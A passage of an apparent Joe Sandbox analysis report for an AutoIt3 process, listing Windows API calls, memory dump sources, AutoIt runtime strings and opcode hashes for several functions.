                                      • Instruction Fuzzy Hash: 78B126F9B10380AFDB20FBB5D985A2AB7F8EB25640B058569F911CF319D778D800EB51
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 00877F45
                                      • DeleteObject.GDI32(00000000), ref: 00877F57
                                      • DestroyWindow.USER32 ref: 00877F65
                                      • GetDesktopWindow.USER32 ref: 00877F7F
                                      • GetWindowRect.USER32(00000000), ref: 00877F86
                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 008780C7
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 008780D7
                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0087811F
                                      • GetClientRect.USER32(00000000,?), ref: 0087812B
                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00878165
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00878187
                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0087819A
                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008781A5
                                      • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008781AE
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008781BD
                                      • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008781C6
                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008781CD
                                      • GlobalFree.KERNEL32(00000000), ref: 008781D8
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008781EA
                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00893C7C,00000000), ref: 00878200
                                      • GlobalFree.KERNEL32(00000000), ref: 00878210
                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00878236
                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00878255
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00878277
                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00878464
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                      • String ID: $AutoIt v3$DISPLAY$static
                                      • API String ID: 2211948467-2373415609
                                      • Opcode ID: eb5f63f45509aa586fb67cbe139899407c5eb6440f79023473335153e0f9f4cd
                                      • Instruction ID: 81a55ede4a4acffe5f1d6138358aa72912c940b30f142cdfeb950514e7588e87
                                      • Opcode Fuzzy Hash: eb5f63f45509aa586fb67cbe139899407c5eb6440f79023473335153e0f9f4cd
                                      • Instruction Fuzzy Hash: 80022971900519EFDB14AFA8CD89EAE7BB9FB48310F148159F919EB2A1CB709D41CF60
                                      APIs
                                      • LoadLibraryA.KERNEL32(PSAPI.dll,?,03CEA4B9), ref: 03CEA150
                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 03CEA16C
                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 03CEA17E
                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 03CEA190
                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 03CEA1A2
                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 03CEA1B4
                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 03CEA1C6
                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 03CEA1D8
                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 03CEA1EA
                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 03CEA1FC
                                      • GetProcAddress.KERNEL32(00000000,EmptyWorkingSet), ref: 03CEA20E
                                      • GetProcAddress.KERNEL32(00000000,QueryWorkingSet), ref: 03CEA220
                                      • GetProcAddress.KERNEL32(00000000,InitializeProcessForWsWatch), ref: 03CEA232
                                      • GetProcAddress.KERNEL32(00000000,GetMappedFileNameA), ref: 03CEA244
                                      • GetProcAddress.KERNEL32(00000000,GetDeviceDriverBaseNameA), ref: 03CEA256
                                      • GetProcAddress.KERNEL32(00000000,GetDeviceDriverFileNameA), ref: 03CEA268
                                      • GetProcAddress.KERNEL32(00000000,GetMappedFileNameA), ref: 03CEA27A
                                      • GetProcAddress.KERNEL32(00000000,GetDeviceDriverBaseNameA), ref: 03CEA28C
                                      • GetProcAddress.KERNEL32(00000000,GetDeviceDriverFileNameA), ref: 03CEA29E
                                      • GetProcAddress.KERNEL32(00000000,GetMappedFileNameW), ref: 03CEA2B0
                                      • GetProcAddress.KERNEL32(00000000,GetDeviceDriverBaseNameW), ref: 03CEA2C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: EmptyWorkingSet$EnumDeviceDrivers$EnumProcessModules$EnumProcesses$GetDeviceDriverBaseNameA$GetDeviceDriverBaseNameW$GetDeviceDriverFileNameA$GetDeviceDriverFileNameW$GetMappedFileNameA$GetMappedFileNameW$GetModuleBaseNameA$GetModuleBaseNameW$GetModuleFileNameExA$GetModuleFileNameExW$GetModuleInformation$GetProcessMemoryInfo$InitializeProcessForWsWatch$PSAPI.dll$QueryWorkingSet
                                      • API String ID: 2238633743-2267155864
                                      • Opcode ID: 399e8e4f8bfe442782b77b33a7f8c19c2da13064fe9bbedb6087bdcd336874fe
                                      • Instruction ID: 20596c60390c4b79531a34d788b6b99d5870bb8e618822a86e0701dbbfe6235d
                                      • Opcode Fuzzy Hash: 399e8e4f8bfe442782b77b33a7f8c19c2da13064fe9bbedb6087bdcd336874fe
                                      • Instruction Fuzzy Hash: B44142FAB10390AFDB51EFB5C98592E77A8EB266403058579F821CF319C378C810AB51
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,00890980), ref: 00883C65
                                      • IsWindowVisible.USER32(?), ref: 00883C89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: BuffCharUpperVisibleWindow
                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                      • API String ID: 4105515805-45149045
                                      • Opcode ID: 8068ff2ac5dc26cc09558e890482a909c65648608d03dda300e0323cf5d31931
                                      • Instruction ID: b4133a488a9e73294d420ef1c4ca7ab21f8f009b6dd0b662ab4e442e3f846092
                                      • Opcode Fuzzy Hash: 8068ff2ac5dc26cc09558e890482a909c65648608d03dda300e0323cf5d31931
                                      • Instruction Fuzzy Hash: 8FD16E30204615CBCB14FF58C851AAAB7A5FF94744F144958F986DB3A3DB31EE4ACB82
                                      APIs
                                      • SetTextColor.GDI32(?,00000000), ref: 0088AC55
                                      • GetSysColorBrush.USER32(0000000F), ref: 0088AC86
                                      • GetSysColor.USER32(0000000F), ref: 0088AC92
                                      • SetBkColor.GDI32(?,000000FF), ref: 0088ACAC
                                      • SelectObject.GDI32(?,?), ref: 0088ACBB
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0088ACE6
                                      • GetSysColor.USER32(00000010), ref: 0088ACEE
                                      • CreateSolidBrush.GDI32(00000000), ref: 0088ACF5
                                      • FrameRect.USER32(?,?,00000000), ref: 0088AD04
                                      • DeleteObject.GDI32(00000000), ref: 0088AD0B
                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0088AD56
                                      • FillRect.USER32(?,?,?), ref: 0088AD88
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0088ADB3
                                        • Part of subcall function 0088AF18: GetSysColor.USER32(00000012), ref: 0088AF51
                                        • Part of subcall function 0088AF18: SetTextColor.GDI32(?,?), ref: 0088AF55
                                        • Part of subcall function 0088AF18: GetSysColorBrush.USER32(0000000F), ref: 0088AF6B
                                        • Part of subcall function 0088AF18: GetSysColor.USER32(0000000F), ref: 0088AF76
                                        • Part of subcall function 0088AF18: GetSysColor.USER32(00000011), ref: 0088AF93
                                        • Part of subcall function 0088AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0088AFA1
                                        • Part of subcall function 0088AF18: SelectObject.GDI32(?,00000000), ref: 0088AFB2
                                        • Part of subcall function 0088AF18: SetBkColor.GDI32(?,00000000), ref: 0088AFBB
                                        • Part of subcall function 0088AF18: SelectObject.GDI32(?,?), ref: 0088AFC8
                                        • Part of subcall function 0088AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0088AFE7
                                        • Part of subcall function 0088AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0088AFFE
                                        • Part of subcall function 0088AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0088B013
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                      • String ID:
                                      • API String ID: 4124339563-0
                                      • Opcode ID: 931e4097870f8a9160703c52d1e194b863676167201336300a3873183e32b962
                                      • Instruction ID: d1acff99d873dd20ac3adeb7fa4c89b9ef915f5c907c50b4d5f1d996cfe7da07
                                      • Opcode Fuzzy Hash: 931e4097870f8a9160703c52d1e194b863676167201336300a3873183e32b962
                                      • Instruction Fuzzy Hash: D0A17C72008305AFE715AF64DC08A6BBBA9FF88321F144A1AF962E61E1D771D944CF52
                                      APIs
                                      • DestroyWindow.USER32(?,?,?), ref: 00803072
                                      • DeleteObject.GDI32(00000000), ref: 008030B8
                                      • DeleteObject.GDI32(00000000), ref: 008030C3
                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 008030CE
                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 008030D9
                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0083C77C
                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0083C7B5
                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0083CBDE
                                        • Part of subcall function 00801F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00802412,?,00000000,?,?,?,?,00801AA7,00000000,?), ref: 00801F76
                                      • SendMessageW.USER32(?,00001053), ref: 0083CC1B
                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0083CC32
                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0083CC48
                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0083CC53
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                      • String ID: 0
                                      • API String ID: 464785882-4108050209
                                      • Opcode ID: 77005a2fa28eefe13adae2dbf07ecee1bede55aa16ba8d832747b30eaee49cf1
                                      • Instruction ID: 85d96d0391f3172436dd322443b68e851c799a6a0eac096664a8eb5aaeb5e4c8
                                      • Opcode Fuzzy Hash: 77005a2fa28eefe13adae2dbf07ecee1bede55aa16ba8d832747b30eaee49cf1
                                      • Instruction Fuzzy Hash: 6512AF30605611EFDB65DF28C889BA5BBE5FF88310F144569E885EB2A2C731ED42CF91
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                      • API String ID: 2660009612-1645009161
                                      • Opcode ID: 204b71a2e9a38ffe19271bd48373f4b37af9a345186f03fb64e7e23970a11f9c
                                      • Instruction ID: 003cbbe9edadd3fcad770926470a259861a3a2a1eb82faa28fe9fe98a62ef16e
                                      • Opcode Fuzzy Hash: 204b71a2e9a38ffe19271bd48373f4b37af9a345186f03fb64e7e23970a11f9c
                                      • Instruction Fuzzy Hash: 7EA1AF30A00219BBCF10AF69DC52EAE7B78FF45740F140029F915EB292EB759AE1D752
                                      APIs
                                      • DestroyWindow.USER32(00000000), ref: 00877BC8
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00877C87
                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00877CC5
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00877CD7
                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00877D1D
                                      • GetClientRect.USER32(00000000,?), ref: 00877D29
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00877D6D
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00877D7C
                                      • GetStockObject.GDI32(00000011), ref: 00877D8C
                                      • SelectObject.GDI32(00000000,00000000), ref: 00877D90
                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00877DA0
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00877DA9
                                      • DeleteDC.GDI32(00000000), ref: 00877DB2
                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00877DDE
                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00877DF5
                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00877E30
                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00877E44
                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00877E55
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00877E85
                                      • GetStockObject.GDI32(00000011), ref: 00877E90
                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00877E9B
                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00877EA5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                      • API String ID: 2910397461-517079104
                                      • Opcode ID: 15a73ef180214ab027daea639f5069f04de4d2d663d7b51c287ef6d31eadfdc0
                                      • Instruction ID: c57f061b081381bdf9d28a3fcca39b1b80da675f234e1f00031febdbd49b002c
                                      • Opcode Fuzzy Hash: 15a73ef180214ab027daea639f5069f04de4d2d663d7b51c287ef6d31eadfdc0
                                      • Instruction Fuzzy Hash: B7A12DB1A40619AFEB149BA8DC4AFAA7BB9FB44710F048115FA15E72E0D770AD00CF64
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0086B361
                                      • GetDriveTypeW.KERNEL32(?,00892C4C,?,\\.\,00890980), ref: 0086B43E
                                      • SetErrorMode.KERNEL32(00000000,00892C4C,?,\\.\,00890980), ref: 0086B59C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DriveType
                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                      • API String ID: 2907320926-4222207086
                                      • Opcode ID: 4fd01a85212313b3345b8f6a27e423ab884b37b2c0c4262eec9fcbde70799fc5
                                      • Instruction ID: 8004b74338ca6906408f8a303065f40a993770a05c78f2ec9aa79c3c09746839
                                      • Opcode Fuzzy Hash: 4fd01a85212313b3345b8f6a27e423ab884b37b2c0c4262eec9fcbde70799fc5
                                      • Instruction Fuzzy Hash: 10516130B4020DEBCB00EB64C94A9FD77A0FF45748B254026E517E7391DBB6AEC19B5A
                                      APIs
                                      • GetSysColor.USER32(00000012), ref: 0088AF51
                                      • SetTextColor.GDI32(?,?), ref: 0088AF55
                                      • GetSysColorBrush.USER32(0000000F), ref: 0088AF6B
                                      • GetSysColor.USER32(0000000F), ref: 0088AF76
                                      • CreateSolidBrush.GDI32(?), ref: 0088AF7B
                                      • GetSysColor.USER32(00000011), ref: 0088AF93
                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0088AFA1
                                      • SelectObject.GDI32(?,00000000), ref: 0088AFB2
                                      • SetBkColor.GDI32(?,00000000), ref: 0088AFBB
                                      • SelectObject.GDI32(?,?), ref: 0088AFC8
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0088AFE7
                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0088AFFE
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0088B013
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0088B05F
                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0088B086
                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0088B0A4
                                      • DrawFocusRect.USER32(?,?), ref: 0088B0AF
                                      • GetSysColor.USER32(00000011), ref: 0088B0BD
                                      • SetTextColor.GDI32(?,00000000), ref: 0088B0C5
                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0088B0D9
                                      • SelectObject.GDI32(?,0088AC1F), ref: 0088B0F0
                                      • DeleteObject.GDI32(?), ref: 0088B0FB
                                      • SelectObject.GDI32(?,?), ref: 0088B101
                                      • DeleteObject.GDI32(?), ref: 0088B106
                                      • SetTextColor.GDI32(?,?), ref: 0088B10C
                                      • SetBkColor.GDI32(?,?), ref: 0088B116
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 1996641542-0
                                      • Opcode ID: 7b444625a40ee691a2c6cffc708c30a73f8f610b57ae4085193cafa594b388ce
                                      • Instruction ID: b6941bc4567e88d52d0710580cb4b9c0b17daba28afd723e3e08582ac83ad4f5
                                      • Opcode Fuzzy Hash: 7b444625a40ee691a2c6cffc708c30a73f8f610b57ae4085193cafa594b388ce
                                      • Instruction Fuzzy Hash: 81612B72900618AFDF11AFA8DC48AAE7B79FF08320F154116FA15AB2A1D7759940DF90
                                      APIs
                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 008890EA
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008890FB
                                      • CharNextW.USER32(0000014E), ref: 0088912A
                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0088916B
                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00889181
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00889192
                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 008891AF
                                      • SetWindowTextW.USER32(?,0000014E), ref: 008891FB
                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00889211
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00889242
                                      • _memset.LIBCMT ref: 00889267
                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 008892B0
                                      • _memset.LIBCMT ref: 0088930F
                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00889339
                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00889391
                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 0088943E
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00889460
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008894AA
                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008894D7
                                      • DrawMenuBar.USER32(?), ref: 008894E6
                                      • SetWindowTextW.USER32(?,0000014E), ref: 0088950E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                      • String ID: 0
                                      • API String ID: 1073566785-4108050209
                                      • Opcode ID: c60547ea1520eac51ea55d9bb0314fbdce2dca2e361dccea02362a75f96701ff
                                      • Instruction ID: 3383718365276a5f2ace88a5ce63913cdf9604fcfbdce7a3ad4ad19587db4051
                                      • Opcode Fuzzy Hash: c60547ea1520eac51ea55d9bb0314fbdce2dca2e361dccea02362a75f96701ff
                                      • Instruction Fuzzy Hash: 7EE19C75900219AFDB21AF94CC88EFE7BB8FF05710F088156F959EA291D7708A81DF61
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00885007
                                      • GetDesktopWindow.USER32 ref: 0088501C
                                      • GetWindowRect.USER32(00000000), ref: 00885023
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00885085
                                      • DestroyWindow.USER32(?), ref: 008850B1
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 008850DA
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008850F8
                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0088511E
                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00885133
                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00885146
                                      • IsWindowVisible.USER32(?), ref: 00885166
                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00885181
                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00885195
                                      • GetWindowRect.USER32(?,?), ref: 008851AD
                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 008851D3
                                      • GetMonitorInfoW.USER32(00000000,?), ref: 008851ED
                                      • CopyRect.USER32(?,?), ref: 00885204
                                      • SendMessageW.USER32(?,00000412,00000000), ref: 0088526F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
